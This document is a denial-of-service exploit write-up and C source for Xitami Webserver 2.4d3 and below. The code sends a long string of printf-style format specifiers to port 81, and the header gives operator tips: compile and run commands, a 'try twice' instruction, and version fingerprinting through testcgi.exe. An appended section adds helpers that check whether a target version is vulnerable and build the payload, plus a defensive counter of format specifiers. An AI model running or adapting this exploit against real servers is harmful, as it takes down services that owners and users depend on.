Xitami Webserver v2.4d3 and below is vulnerable to a remote DoS. Sending a string of printf-style format specifiers (%s%d%u repeated) to TCP port 81, the LRWP listener judging by the xilrwp module named in the abort message below, makes the server throw its crash-recovery dialog and stop accepting connections on port 80 until someone at the console restarts it. Tested against Xitami on Win95/98/NT4.0.
/*
CODE IS CRAP, COULD BE OPTIMISED/MADE PRETTIER, BUT I DID NOT BOTHER. SUE ME.
DoS attack, Xitami v2.4d3 and below (makes xitami give you crash-bug dialog).
^-------^----- for Windows9x/NT/2000(?)
Discovered by: m0zy
Coded by: m0zy
Testing: afr0tits
NO, I DIDN'T FUCKING CUT&PASTE!
e-mail: mozy@usa.com
---
## Code tested on:
FreeBSD 4.0-RELEASE, OpenBSD 2.7 (thanx perkinz.org).
Won't work on Linux (*BSD > Linux, by the way). Port it yourself.
**
root@localhost# gcc -o xitdos xitdos.c
root@localhost# ./xitdos www.example.com
**
If you get a warning with something like "passing arg 2..."
just ignore it.
---
Just for safety's sake, ./try twice (to make sure the box is dead).
If you get a "Broken pipe" error when you ./run this shit, you're out
of luck, you're trying to DoS a newer version of Xitami (above 2.4d3),
which it won't work for.
To find out the version of Xitami you are trying to DoS, go to the URL and
access /cgi-bin/testcgi.exe (eg: http://www.example.com/cgi-bin/testcgi.exe)
Then look for "SERVER_VERSION", which will tell you what version it is.
---
Basic Explanation (lame-man's terms): Send any string, followed by
%s%d%u looped 222 times (1332 bytes of format specifiers, 1337 with the
"test " prefix the code uses), to port 81. You can loop it longer, but 222
is the minimum from my experience, and BEWM@$#!@%...you get a "Xitami Crash
Recovery" dialog box on the server machine. The error looks something like this:
"05/Jun/2000:23:27:46 -0800 Xitami v2.4c3
Abort at xilrwp:Read-App-Name-And-Start-Router: (Peer-Startup, Sock-Input-Ok-Event)"
You get 3 buttons - " |RESTART| |ABORT| |DEBUG| "
If there is no one currently at the console on the server to restart
it, you did it, you DoS'ed the b0x.
Technically, the server doesn't crash, but instead sits in that dialog and
stops accepting any more connections on port 80. Now that's good error-checking
code for ya.
---
The ever-so-popular Greets (in NO order!):
lyp0x, Max0r, oreo, nugz, xess0r, coldsnap, con, seg, snownix, koi,
alphanuma, juso, burnyd, sipher, all of #flem and #sigint on EFnet,
and all the other lamuhs I didn't mention.
Oh yeah, get on irc.perkinz.org - #perkinz.
Crazy canucks.
*/
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

#define LRWP_PORT 81     /* the port the payload goes to; not taken from argv */
#define REPS      222    /* "%s%d%u" repetitions: 5 + 222*6 = 1337 bytes */

int main(int argc, char *argv[])
{
    int sock, i;
    size_t len;
    struct sockaddr_in mmk;
    struct hostent *host;
    char buf[5 + REPS * 6];          /* exactly 1337 bytes, no NUL needed */

    if (argc < 2) {
        printf("--> ./xitdos [hostname]\n");
        printf("--> Xitami DoS coded by m0zy.\n");
        printf("--> E-Mail: mozy@usa.com\n");
        return -1;
    }
    if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
        perror("network sockets fudged up");
        return -1;
    }
    /* resolve first, check, then use: the original read host->h_addr
       before testing host for NULL */
    host = gethostbyname(argv[1]);
    if (host == NULL) {
        printf(" -!!!- error, unknown hostname(%s)?\n", argv[1]);
        return -1;
    }
    memset(&mmk, 0, sizeof(mmk));
    mmk.sin_family = AF_INET;
    mmk.sin_port = htons(LRWP_PORT);
    memcpy(&mmk.sin_addr, host->h_addr_list[0], host->h_length);

    printf("-\n- If you get a \"Broken Pipe\" error, you're shit outta luck, try another server.\n");
    printf("-\n- connecting to: %s \n- using port: %d\n-\n", argv[1], ntohs(mmk.sin_port));
    printf(" - host address - %s\n", inet_ntoa(mmk.sin_addr));
    if (connect(sock, (struct sockaddr *)&mmk, sizeof(mmk)) < 0) {
        printf(" -!!!-network connect failed(unknown hostname or no response from server)\n\n");
        return -1;
    }

    /* Heh, the main 31337 DoS part...stare at it in *awe*.
       "test " followed by "%s%d%u" REPS times, the same 1337 bytes the
       original spelled out as one giant string literal. */
    len = strlen("test ");
    memcpy(buf, "test ", len);
    for (i = 0; i < REPS; i++, len += 6)
        memcpy(buf + len, "%s%d%u", 6);

    if (write(sock, buf, len) != (ssize_t)len) {
        perror(" -!!!- write failed");
        close(sock);
        return -1;
    }
    printf(" - network received DoS data!\n-\n");
    close(sock);
    return 0;
}
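Two things the header does by hand, the SERVER_VERSION lookup via /cgi-bin/testcgi.exe and the shape of the 1337-byte %s%d%u payload, as an added C example that is not part of m0zy's code. The testcgi.exe body layout (NAME=value, one per line), the helper names and the sample strings are assumptions constructed for this example; the version comparison treats Xitami's "2.4d3" scheme as major.minor, release letter, optional patch digit, which is what the versions quoted on this page look like. The last function is the defender's side of the same thing: a count of printf conversions in a captured payload to port 81, which nothing legitimate talking to that port should need.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* A Xitami version like "2.4d3" or "2.5c": major.minor, release letter,
 * optional patch digit (0 if absent). Scheme inferred from the versions
 * quoted on this page (assumption). */
struct xver { int major, minor, letter, patch; };

/* Parse "M.Nl[p]". Leading text such as "Xitami/" or "Xitami v" is skipped.
 * Returns 1 on success, 0 if the string is not in that shape. */
int parse_xitami_version(const char *s, struct xver *v)
{
    int n = 0;
    while (*s && !isdigit((unsigned char)*s))
        s++;
    if (sscanf(s, "%d.%d%n", &v->major, &v->minor, &n) != 2)
        return 0;
    s += n;
    if (!isalpha((unsigned char)*s))
        return 0;
    v->letter = tolower((unsigned char)*s++);
    v->patch = isdigit((unsigned char)*s) ? *s++ - '0' : 0;
    /* trailing whitespace is fine; another alphanumeric is a shape we
       do not understand, so refuse rather than guess */
    return !isalnum((unsigned char)*s);
}

/* <0, 0, >0 like strcmp; letters compare in ASCII order (c < d). */
int xver_cmp(const struct xver *a, const struct xver *b)
{
    int d = a->major - b->major;
    if (!d) d = a->minor - b->minor;
    if (!d) d = a->letter - b->letter;
    return d ? d : a->patch - b->patch;
}

/* 1 = 2.4d3 or older (the range the advisory names), 0 = newer,
 * -1 = not a version string we can read. */
int xitami_in_affected_range(const char *s)
{
    struct xver v, last = { 2, 4, 'd', 3 };
    if (!parse_xitami_version(s, &v))
        return -1;
    return xver_cmp(&v, &last) <= 0;
}

/* Value after "SERVER_VERSION" in a testcgi.exe body. One "NAME=value" per
 * line is an assumed layout; the page only names the variable. */
int server_version_from_testcgi(const char *body, char *out, size_t cap)
{
    const char *p = strstr(body, "SERVER_VERSION");
    size_t i = 0;
    if (!p || cap == 0)
        return 0;
    p += strlen("SERVER_VERSION");
    while (*p == '=' || *p == ':' || *p == ' ' || *p == '\t')
        p++;
    while (*p && *p != '\r' && *p != '\n' && i + 1 < cap)
        out[i++] = *p++;
    out[i] = '\0';
    return i > 0;
}

/* Constructed sample with the exploit's shape: "test " + reps x "%s%d%u".
 * Returns the byte count written, 0 if it does not fit. */
size_t build_sample_payload(unsigned char *out, size_t cap, int reps)
{
    size_t len = 5;
    int i;
    if (reps < 0 || cap < len + (size_t)reps * 6)
        return 0;
    memcpy(out, "test ", len);
    for (i = 0; i < reps; i++, len += 6)
        memcpy(out + len, "%s%d%u", 6);
    return len;
}

/* Detection side: count printf-style conversions in a captured payload.
 * The exploit carries 666 in 1337 bytes; "%%" is a literal percent. */
size_t count_conversion_specs(const unsigned char *p, size_t n)
{
    size_t i, count = 0;
    for (i = 0; i + 1 < n; i++) {
        if (p[i] != '%')
            continue;
        if (p[i + 1] != '\0' && strchr("sdiuxXcpn", p[i + 1]))
            count++;
        i++;                        /* step over the char after '%' */
    }
    return count;
}
```

Feed the body of a testcgi.exe response to server_version_from_testcgi() and the result to xitami_in_affected_range(): 1 means the version is in the 2.4d3-and-below range, 0 means newer (where the header says you get "Broken pipe"), -1 means the string was not a version we can read, which should stop the run rather than guess. count_conversion_specs() over a packet capture to port 81 gives a cheap signature: the payload above scores 666, an ordinary application name scores 0.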